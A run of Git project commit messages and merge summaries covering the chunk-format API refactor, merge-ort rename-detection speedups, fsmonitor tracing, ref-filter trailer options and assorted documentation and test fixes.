git-gui: remove lines starting with the comment character
f4ed0af6 (Merge branch 'nd/columns', 2012-05-03) brought in three
cut-and-pasted copies of malformatted descriptions. Let's fix them
all the same way by marking the configuration variable names up as
monospace just like the command line option `--column` is typeset.
While we are at it, correct a missing space after the full stop that
ends the sentence.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The chunk-based file format is now an API in the code, but we should
also take time to document it as a file format. Specifically, it matches
the CHUNK LOOKUP sections of the commit-graph and multi-pack-index
files, but there are some commonalities that should be grouped in this
document.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before refactoring into the chunk-format API, the commit-graph parsing
logic included checks for duplicate chunks. It is unlikely that we would
desire a chunk-based file format that allows duplicate chunk IDs in the
table of contents, so add duplicate checks into
read_table_of_contents().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When calculating the sizes of certain chunks, we should use 64-bit
multiplication always. This allows us to properly predict the chunk
sizes without risk of overflow.
Other possible overflows were discovered by evaluating each
multiplication in midx.c and ensuring that at least one side of the
operator was of type size_t or off_t.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of parsing the table of contents directly, use the chunk-format
API methods read_table_of_contents() and pair_chunk(). In particular, we
can use the return value of pair_chunk() to generate an error when a
required chunk is missing.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of parsing the table of contents directly, use the chunk-format
API methods read_table_of_contents() and pair_chunk(). While the current
implementation loses the duplicate-chunk detection, that will be added
in a future change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the capability to read the table of contents, then pair the chunks
with necessary logic using read_chunk_fn pointers. Callers will be added
in future changes, but the typical outline will be:
1. initialize a 'struct chunkfile' with init_chunkfile(NULL).
2. call read_table_of_contents().
3. for each chunk to parse,
a. call pair_chunk() to assign a pointer with the chunk position, or
b. call read_chunk() to run a callback on the chunk start and size.
4. call free_chunkfile() to clear the 'struct chunkfile' data.
We are re-using the anonymous 'struct chunkfile' data, as it is internal
to the chunk-format API. This gives it essentially two modes: write and
read. If the same struct instance was used for both reads and writes,
then there would be failures.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The chunk-format API allows writing the table of contents and all chunks
using the anonymous 'struct chunkfile' type. We only need to convert our
local chunk logic to this API for the multi-pack-index writes to share
that logic with the commit-graph file writes.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Most expensive operations in write_midx_internal() use the context
struct's progress member, and these indicate the process of the
expensive operations within the chunk writing methods. However, there is
a competing progress struct that counts the progress over all chunks.
This is not very helpful compared to the others, so drop it.
This also reduces our barriers to combining the chunk writing code with
chunk-format.c.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Historically, the chunk-writing methods in midx.c have returned the
amount of data written so the writer method could compare this with the
table of contents. This presents with some interesting issues:
1. If a chunk writing method has a bug that miscalculates the written
bytes, then we can satisfy the table of contents without actually
writing the right amount of data to the hashfile. The commit-graph
writing code checks the hashfile struct directly for a more robust
verification.
2. There is no way for a chunk writing method to gracefully fail.
Returning an int presents an opportunity to fail without a die().
3. The current pattern doesn't match chunk_write_fn type exactly, so we
cannot share code with commit-graph.c
For these reasons, convert the midx chunk writer methods to return an
'int'. Since none of them fail at the moment, they all return 0.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "uint32_t num_large_offsets" into the context. With
this new data, write_midx_large_offsets() now matches the
chunk_write_fn type.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "uint32_t *pack_perm" and large_offsets_needed bit
into the context.
Update write_midx_object_offsets() to match chunk_write_fn.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "struct pack_midx_entry *entries" list and its count
into the context.
Update write_midx_oid_fanout() and write_midx_oid_lookup() to take the
context directly, as these are easy conversions with this new data.
Only the callers of write_midx_object_offsets() and
write_midx_large_offsets() are updated here, since additional data in
the context before those methods can match chunk_write_fn.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align the write_midx_internal() to use the chunk-format
API, start converting chunk writing methods to match chunk_write_fn. The
first case is to convert write_midx_pack_names() to take "void *data".
We already have the necessary data in "struct write_midx_context", so
this conversion is rather mechanical.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to streamline our chunk-based file formats, align some of
the code structure in write_midx_internal() to be similar to the
patterns in write_commit_graph_file().
Specifically, let's create a "struct write_midx_context" that can be
used as a data parameter to abstract function types.
This change only renames "struct pack_info" to "struct
write_midx_context" and the names of instances from "packs" to "ctx". In
future changes, we will expand the data inside "struct
write_midx_context" and align our chunk-writing method with the
chunk-format API.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph write logic is ready to make use of the chunk-format
write API. Each chunk write method is already in the correct prototype.
We only need to use the 'struct chunkfile' pointer and the correct API
calls.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In anticipation of combining the logic from the commit-graph and
multi-pack-index file formats, create a new chunk-format API. Use a
'struct chunkfile' pointer to keep track of data that has been
registered for writes. This struct is anonymous outside of
chunk-format.c to ensure no user attempts to interfere with the data.
The next change will use this API in commit-graph.c, but the general
approach is:
1. initialize the chunkfile with init_chunkfile(f).
2. add chunks in the intended writing order with add_chunk().
3. write any header information to the hashfile f.
4. write the chunkfile data using write_chunkfile().
5. free the chunkfile struct using free_chunkfile().
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both AsciiDoc and Asciidoctor are eager to pick up the e-mail addresses
in this document and turn them into references at the bottom of the
manpage / clickable links. We don't really need that for these dummy
addresses. Spell "@" as "@" to make them not do this. In the open
block, we can instead avoid this by indenting the contents, similar to
the earlier blocks.
Fix a backtick which should have been a single quote mark. With all the
quoting that is going on around here, this mistake trips up the parsing
and rendering quite a bit.
Before this commit, we have the same failure mode with AsciiDoc 8.6.10
and Asciidoctor 1.5.5, and this change makes both of them happy.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we write `<name>`s with the "s" tucked on to the closing backtick,
we end up rendering the backticks literally. Rephrase this sentence
slightly to render this as monospace.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The comment character is specified by the config variable
'core.commentchar'. Any lines starting with this character is considered
a comment and should not be included in the final commit message.
Teach git-gui to filter out lines in the commit message that start with
the comment character using git-stripspace. If the config is not set,
'#' is taken as the default. Also add a message educating users about
the comment character.
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The error message given when a configuration variable that is
expected to have a boolean value has been improved.
* ak/config-bad-bool-error:
config: improve error message for boolean config
"git reflog expire --stale-fix" can be used to repair the reflog by
removing entries that refer to objects that have been pruned away,
but was not careful to tolerate missing objects.
* js/reflog-expire-stale-fix:
reflog expire --stale-fix: be generous about missing objects
When certain features (e.g. grafts) used in the repository are
incompatible with the use of the commit-graph, we used to silently
turned commit-graph off; we now tell the user what we are doing.
* js/commit-graph-warning:
commit-graph: when incompatible with graphs, indicate why
Test to make sure "git rev-parse one-thing one-thing" gives
the same thing twice (when one-thing is --since=X).
* ew/rev-parse-since-test:
t1500: ensure current --since= behavior remains
Avoid individual tests in t5411 from getting affected by each other
by forcing them to use separate output files during the test.
* jx/t5411-unique-filenames:
t5411: refactor check of refs using test_cmp_refs
t5411: use different out file to prevent overwriting
Fix "git fsck --name-objects" which apparently has not been used by
anybody who is motivated enough to report breakage.
* js/fsck-name-objects-fix:
fsck --name-objects: be more careful parsing generation numbers
t1450: robustify `remove_object()`
The .mailmap is documented to be read only from the root level of a
working tree, but a stray file in a bare repository also was read
by accident, which has been corrected.
* jk/mailmap-only-at-root:
mailmap: only look for .mailmap in work tree
"git grep --untracked" is meant to be "let's ALSO find in these
files on the filesystem" when looking for matches in the working
tree files, and does not make any sense if the primary search is
done against the index, or the tree objects. The "--cached" and
"--untracked" options have been marked as mutually incompatible.
* mt/grep-cached-untracked:
grep: error out if --untracked is used with --cached
"git mergetool" feeds three versions (base, local and remote) of
a conflicted path unmodified. The command learned to optionally
prepare these files with unconflicted parts already resolved.
* sh/mergetool-hideresolved:
mergetool: add per-tool support and overrides for the hideResolved flag
mergetool: break setup_tool out into separate initialization function
mergetool: add hideResolved configuration
Even though invocations of "die()" were logged to the trace2
system, "BUG()"s were not, which has been corrected.
* jt/trace2-BUG:
usage: trace2 BUG() invocations
The "git range-diff" command learned "--(left|right)-only" option
to show only one side of the compared range.
* js/range-diff-one-side-only:
range-diff: offer --left-only/--right-only options
range-diff: move the diffopt initialization down one layer
range-diff: combine all options in a single data structure
range-diff: simplify code spawning `git log`
range-diff: libify the read_patches() function again
range-diff: avoid leaking memory in two error code paths
There are other ways than ".." for a single token to denote a
"commit range", namely "<rev>^!" and "<rev>^-<n>", but "git
range-diff" did not understand them.
* js/range-diff-wo-dotdot:
range-diff(docs): explain how to specify commit ranges
range-diff/format-patch: handle commit ranges other than A..B
range-diff/format-patch: refactor check for commit range
"git clone" tries to locally check out the branch pointed at by
HEAD of the remote repository after it is done, but the protocol
did not convey the information necessary to do so when copying an
empty repository. The protocol v2 learned how to do so.
* jt/clone-unborn-head:
clone: respect remote unborn HEAD
connect, transport: encapsulate arg in struct
ls-refs: report unborn targets of symrefs
Piecemeal of rewrite of "git bisect" in C continues.
* mr/bisect-in-c-4:
bisect--helper: retire `--check-and-set-terms` subcommand
bisect--helper: reimplement `bisect_skip` shell function in C
bisect--helper: retire `--bisect-auto-next` subcommand
bisect--helper: use `res` instead of return in BISECT_RESET case option
bisect--helper: retire `--bisect-write` subcommand
bisect--helper: reimplement `bisect_replay` shell function in C
bisect--helper: reimplement `bisect_log` shell function in C
Fix incremental update of commit-graph file around corrected commit
date data.
* ds/commit-graph-genno-fix:
commit-graph: prepare commit graph
commit-graph: be extra careful about mixed generations
commit-graph: compute generations separately
commit-graph: validate layers for generation data
commit-graph: always parse before commit_graph_data_at()
commit-graph: use repo_parse_commit
The commit-graph learned to use corrected commit dates instead of
the generation number to help topological revision traversal.
* ak/corrected-commit-date:
doc: add corrected commit date info
commit-reach: use corrected commit dates in paint_down_to_common()
commit-graph: use generation v2 only if entire chain does
commit-graph: implement generation data chunk
commit-graph: implement corrected commit date
commit-graph: return 64-bit generation number
commit-graph: add a slab to store topological levels
t6600-test-reach: generalize *_three_modes
commit-graph: consolidate fill_commit_graph_info
revision: parse parent in indegree_walk_step()
commit-graph: fix regression when computing Bloom filters
Git Protocol version 2[1] defines 0002 as a Message Packet that indicates
the end of a response for stateless connections.
Change the naming of the 0002 Packet to 'Response End' to match the
parsing introduced in Wireshark's MR !1922 for consistency. A subsequent
MR in Wireshark will address additional mismatches.
[1] kernel.org/pub/software/scm/git/docs/technical/protocol-v2.html
[2] gitlab.com/wireshark/wireshark/-/merge_requests/1922
Signed-off-by: Joey Salazar <jgsal@protonmail.com>
Reviewed-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's not immediately obvious why --disk-usage might be a useful thing.
These examples show off a few of the real-world cases I've used it for.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We currently don't show any examples of using git-rev-list at all. Let's
add some pretty elementary examples. They likely seem obvious to anybody
who has worked with the tool for a while, but my purpose here is
two-fold:
- they may be enlightening to people who haven't used the tool a lot
to give a general flavor of how it is meant to be used
- they can serve as a starting point for adding more interesting
examples (we can do that without the basic ones, of course, but I
think it makes sense to show off the building blocks)
This set is far from exhaustive, but again, the purpose is to be a
starting point for further additions.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In git-log(1) -- but not in git-shortlog(1) or git-rev-list(1) -- we
include a bonus paragraph in the description of `--first-parent`. But
we forgot to add a lone "+" for a list continuation, and we shouldn't
be indenting this second paragraph. As a result, we get a different
indentation and the `backticks` render literally.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `git blame --color-by-age`, the determine_line_heat() is called to
select how to color the output based on the commit's author date. It
uses the get_commit_info() to parse the information into a `commit_info`
structure, however, this is actually unnecessary because the
determine_line_heat() caller also does the same.
Instead, let's change the determine_line_heat() to take a `commit_info`
structure and remove the internal call to get_commit_info() thus
cleaning up and optimizing the code path.
Enabling Git's trace2 API in order to record the execution time for
every call to determine_line_heat() function:
+ trace2_region_enter("blame", "determine_line_heat", the_repository);
determine_line_heat(ent, &default_color);
+ trace2_region_enter("blame", "determine_line_heat", the_repository);
Then, running `git blame` for "kernel/fork.c" in linux.git and summing
all the execution time for every call (around 1.3k calls) resulted in
2.6x faster execution (best out 3):
git built from 328c109303 (The eighth batch, 2021-02-12) = 42ms
git built from 328c109303 + this change = 16ms
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Isolate and document initialization of `istate->fsmonitor_last_update`.
This field should contain a fsmonitor-specific opaque token, but we
need to initialize it before we can actually talk to a fsmonitor process,
so we create a generic default value.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's measure the time taken to request and receive FSMonitor data
via the hook API and the size of the response.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the number of files in the working directory that were read and
their hashes verified in `refresh_index()`.
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the total number of calls made to lstat() inside of refresh_index().
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. This can be seen in
`refresh_index()`. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the total number of calls made to lstat() inside preload_index().
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. This can be seen in
`preload_index()`. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add optional trace logging to allow us to better compare performance of
various fsmonitor providers and compare results with non-fsmonitor runs.
Currently, this includes Trace2 logging, but may be extended to include
other trace targets, such as GIT_TRACE_FSMONITOR if desired.
Using this logging helped me explain an odd behavior on MacOS where the
kernel was dropping events and causing the hook to Watchman to timeout.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Shutdown Watchman after the Watchman-based tests and before the block of
"no fsmonitor" tests.
This helps ensure that Watchman cannot affect the test results for the
other.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Only use the final portion of the test trash directory file name
when verifying that Watchman was started.
On Windows and under the SDK, $GIT_WORKTREE is a cygwin-style
path with forward slashes and a "/c/" drive name. However
`watchman watch-list` reports a proper Windows-style pathname
with drive letters and backslashes. This causes the grep to
fail. Since we don't really care about the full pathname (and
we really don't want to bother with normalizaing them), just see
if the test-name portion of the path is found.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert the test to use a more portable method to update the mtime on a
large number of files under version control.
The Mac version of xargs does not support the "-d" option.
Likewise, the "-0" and "--null" options are not portable.
Furthermore, use `test-tool chmtime` rather than `touch` to update the
mtime to ensure that it is actually updated (especially on file systems
with only whole second resolution).
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With --temp (or --stage=all, which implies --temp), checkout-index
writes a list to stdout associating temporary file names to the entries'
names. But if it fails to write an entry, and the failure happens before
even assigning a temporary filename to that entry, we get an odd output
line. This can be seen when trying to check out a symlink whose blob is
missing:
$ missing_blob=$(git hash-object --stdin </dev/null)
$ git update-index --add --cacheinfo 120000,$missing_blob,foo
$ git checkout-index --temp foo
error: unable to read sha1 file of foo (e69de29bb2)
foo
The 'TAB foo' line is not much useful and it might break scripts that
expect the 'tempname TAB foo' output. So let's omit such entries from
the stdout list (but leaving the error message on stderr).
We could also consider omitting _all_ failed entries from the output
list, but that's probably not a good idea as the associated tempfiles
may have been created even when checkout failed, so scripts may want to
use the output list for cleanup.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variables `path` and `ce->name`, at write_entry(), usually have the
same contents, but that's not the case when using a checkout prefix or
writing to a tempfile. (In fact, `path` will be either empty or dirty
when writing to a tempfile.) Therefore, these variables cannot be used
interchangeably. In this sense, fix wrong uses of `path` in error
messages where it should really be `ce->name`, and add some regression
tests. (Note: there doesn't seem to be any misuse in the other way
around.)
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the implementation of "git difftool", there is a case where the
user wants to start viewing the diffs at a specific path and
continue on to the rest, optionally wrapping around to the
beginning. Since it is somewhat cumbersome to implement such a
feature as a post-processing step of "git diff" output, let's
support it internally with two new options.
- "git diff --rotate-to=C", when the resulting patch would show
paths A B C D E without the option, would "rotate" the paths to
shows patch to C D E A B instead. It is an error when there is
no patch for C is shown.
- "git diff --skip-to=C" would instead "skip" the paths before C,
and shows patch to C D E. Again, it is an error when there is no
patch for C is shown.
- "git log [-p]" also accepts these two options, but it is not an
error if there is no change to the specified path. Instead, the
set of output paths are rotated or skipped to the specified path
or the first path that sorts after the specified path.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to pass additional information to diffcore_rename() (or some
variant thereof) without plumbing that extra information through
diff_tree_oid() and diffcore_std(). Further, since we will need to
gather additional special information related to diffs and are walking
the trees anyway in collect_merge_info(), it seems odd to have
diff_tree_oid()/diffcore_std() repeat those tree walks. And there may
be times where we can avoid traversing into a subtree in
collect_merge_info() (based on additional information at our disposal),
that the basic diff logic would be unable to take advantage of. For all
these reasons, just create the add and delete pairs ourself and then
call diffcore_rename() directly.
This change is primarily about enabling future optimizations; the
advantage of avoiding extra tree traversals is small compared to the
cost of rename detection, and the advantage of avoiding the extra tree
traversals is somewhat offset by the extra time spent in
collect_merge_info() collecting the additional data anyway. However...
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
Before After
no-renames: 13.294 s ± 0.103 s 12.775 s ± 0.062 s
mega-renames: 187.248 s ± 0.882 s 188.754 s ± 0.284 s
just-one-mega: 5.557 s ± 0.017 s 5.599 s ± 0.019 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The last few patches have introduced a new preliminary step when rename
detection is on but both break detection and copy detection are off.
Document this new step. While we're at it, add a testcase that checks
the new behavior as well.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make use of the new find_basename_matches() function added in the last
two patches, to find renames more rapidly in cases where we can match up
files based on basenames. As a quick reminder (see the last two commit
messages for more details), this means for example that
docs/extensions.txt and docs/config/extensions.txt are considered likely
renames if there are no remaining 'extensions.txt' files elsewhere among
the added and deleted files, and if a similarity check confirms they are
similar, then they are marked as a rename without looking for a better
similarity match among other files. This is a behavioral change, as
covered in more detail in the previous commit message.
We do not use this heuristic together with either break or copy
detection. The point of break detection is to say that filename
similarity does not imply file content similarity, and we only want to
know about file content similarity. The point of copy detection is to
use more resources to check for additional similarities, while this is
an optimization that uses far less resources but which might also result
in finding slightly fewer similarities. So the idea behind this
optimization goes against both of those features, and will be turned off
for both.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
Before After
no-renames: 13.815 s ± 0.062 s 13.294 s ± 0.103 s
mega-renames: 1799.937 s ± 0.493 s 187.248 s ± 0.882 s
just-one-mega: 51.289 s ± 0.019 s 5.557 s ± 0.017 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is not uncommon in real world repositories for the majority of file
renames to not change the basename of the file; i.e. most "renames" are
just a move of files into different directories. We can make use of
this to avoid comparing all rename source candidates with all rename
destination candidates, by first comparing sources to destinations with
the same basenames. If two files with the same basename are
sufficiently similar, we record the rename; if not, we include those
files in the more exhaustive matrix comparison.
This means we are adding a set of preliminary additional comparisons,
but for each file we only compare it with at most one other file. For
example, if there was a include/media/device.h that was deleted and a
src/module/media/device.h that was added, and there are no other
device.h files in the remaining sets of added and deleted files after
exact rename detection, then these two files would be compared in the
preliminary step.
This commit does not yet actually employ this new optimization, it
merely adds a function which can be used for this purpose. The next
commit will do the necessary plumbing to make use of it.
Note that this optimization might give us different results than without
the optimization, because it's possible that despite files with the same
basename being sufficiently similar to be considered a rename, there's
an even better match between files without the same basename. I think
that is okay for four reasons: (1) it's easy to explain to the users
what happened if it does ever occur (or even for them to intuitively
figure out), (2) as the next patch will show it provides such a large
performance boost that it's worth the tradeoff, and (3) it's somewhat
unlikely that despite having unique matching basenames that other files
serve as better matches. Reason (4) takes a full paragraph to
explain...
If the previous three reasons aren't enough, consider what rename
detection already does. Break detection is not the default, meaning
that if files have the same _fullname_, then they are considered related
even if they are 0% similar. In fact, in such a case, we don't even
bother comparing the files to see if they are similar let alone
comparing them to all other files to see what they are most similar to.
Basically, we override content similarity based on sufficient filename
similarity. Without the filename similarity (currently implemented as
an exact match of filename), we swing the pendulum the opposite
direction and say that filename similarity is irrelevant and compare a
full N x M matrix of sources and destinations to find out which have the
most similar contents. This optimization just adds another form of
filename similarity comparison, but augments it with a file content
similarity check as well. Basically, if two files have the same
basename and are sufficiently similar to be considered a rename, mark
them as such without comparing the two to all other rename candidates.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to make use of unique basenames among remaining source and
destination files to help inform rename detection, so that more likely
pairings can be checked first. (src/moduleA/foo.txt and
source/module/A/foo.txt are likely related if there are no other
'foo.txt' files among the remaining deleted and added files.) Add a new
function, not yet used, which creates a map of the unique basenames
within rename_src and another within rename_dst, together with the
indices within rename_src/rename_dst where those basenames show up.
Non-unique basenames still show up in the map, but have an invalid index
(-1).
This function was inspired by the fact that in real world repositories,
files are often moved across directories without changing names. Here
are some sample repositories and the percentage of their historical
renames (as of early 2020) that preserved basenames:
* linux: 76%
* gcc: 64%
* gecko: 79%
* webkit: 89%
These statistics alone don't prove that an optimization in this area
will help or how much it will help, since there are also unpaired adds
and deletes, restrictions on which basenames we consider, etc., but it
certainly motivated the idea to try something in this area.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a simple test where a removed file is similar to two different added
files; one of them has the same basename, and the other has a slightly
higher content similarity. In the current test, content similarity is
weighted higher than filename similarity.
Subsequent commits will add a new rule that weighs a mixture of filename
similarity and content similarity in a manner that will change the
outcome of this testcase.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have to look at each entry in rename_src a total of rename_dst_nr
times. When we're not detecting copies, any exact renames or ignorable
rename paths will just be skipped over. While checking that these can
be skipped over is a relatively cheap check, it's still a waste of time
to do that check more than once, let alone rename_dst_nr times. When
rename_src_nr is a few thousand times bigger than the number of relevant
sources (such as when cherry-picking a commit that only touched a
handful of files, but from a side of history that has different names
for some high level directories), this time can add up.
First make an initial pass over the rename_src array and move all the
relevant entries to the front, so that we can iterate over just those
relevant entries.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
Before After
no-renames: 14.119 s ± 0.101 s 13.815 s ± 0.062 s
mega-renames: 1802.044 s ± 0.828 s 1799.937 s ± 0.493 s
just-one-mega: 51.391 s ± 0.028 s 51.289 s ± 0.019 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now, ref-filter is using pretty.c logic for setting trailer options.
New to ref-filter:
:key=<K> - only show trailers with specified key.
:valueonly[=val] - only show the value part.
:separator=<SEP> - inserted between trailer lines.
:key_value_separator=<SEP> - inserted between key and value in trailer lines
Enhancement to existing options(now can take value and its optional):
:only[=val]
:unfold[=val]
'val' can be: true, on, yes or false, off, no.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we would like to use this trailers logic in the ref-filter, it's
nice to get an invalid trailer argument. This will allow us to print
precise error message while using `format_set_trailers_options()` in
ref-filter.
For capturing the invalid argument, we changed the working of
`format_set_trailers_options()` a little bit.
Original logic does "break" and fell through in mainly 2 cases -
1. unknown/invalid argument
2. end of the arg string
But now instead of "break", we capture invalid argument and return
non-zero. And non-zero is handled by the caller.
(We prepared the caller to handle non-zero in the previous commit).
Capturing invalid arguments this way will also affects the working
of current logic. As at the end of the arg string it will return non-zero.
So in order to make things correct, introduced an additional conditional
statement i.e if encounter ")", do 'break'.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactored trailers formatting logic inside pretty.c to a new function
`format_set_trailers_options()`. This new function returns the non-zero
in case of unusual. The caller handles the non-zero by "goto trailers_out".
This change will allow us to reuse the same logic in other places.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a function to test trailer options. This will make tests look cleaner,
as well as will make it easier to add new tests for trailers in the future.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When commands are started from a subdirectory, they may have to
compare the path to the subdirectory (called prefix and found out
from $(pwd)) with the tracked paths. On macOS, $(pwd) and
readdir() yield decomposed path, while the tracked paths are
usually normalized to the precomposed form, causing mismatch. This
has been fixed by taking the same approach used to normalize the
command line arguments.
* tb/precompose-prefix-too:
MacOS: precompose_argv_prefix()
The command line completion (in contrib/) completed "git branch -d"
with branch names, but "git branch -D" offered tagnames in addition,
which has been corrected. "git branch -M" had the same problem.
* jk/complete-branch-force-delete:
doc/git-branch: fix awkward wording for "-c"
completion: handle other variants of "branch -m"
completion: treat "branch -D" the same way as "branch -d"
Fix in passing custom args from "git clone" to "upload-pack" on the
other side.
* jv/upload-pack-filter-spec-quotefix:
t5544: clarify 'hook works with partial clone' test
upload-pack.c: fix filter spec quoting bug
Introduce an on-disk file to record revindex for packdata, which
traditionally was always created on the fly and only in-core.
* tb/pack-revindex-on-disk:
t5325: check both on-disk and in-memory reverse index
pack-revindex: ensure that on-disk reverse indexes are given precedence
t: support GIT_TEST_WRITE_REV_INDEX
t: prepare for GIT_TEST_WRITE_REV_INDEX
Documentation/config/pack.txt: advertise 'pack.writeReverseIndex'
builtin/pack-objects.c: respect 'pack.writeReverseIndex'
builtin/index-pack.c: write reverse indexes
builtin/index-pack.c: allow stripping arbitrary extensions
pack-write.c: prepare to write 'pack-*.rev' files
packfile: prepare for the existence of '*.rev' files
Various test updates.
* ab/tests-various-fixup:
rm tests: actually test for SIGPIPE in SIGPIPE test
archive tests: use a cheaper "zipinfo -h" invocation to get header
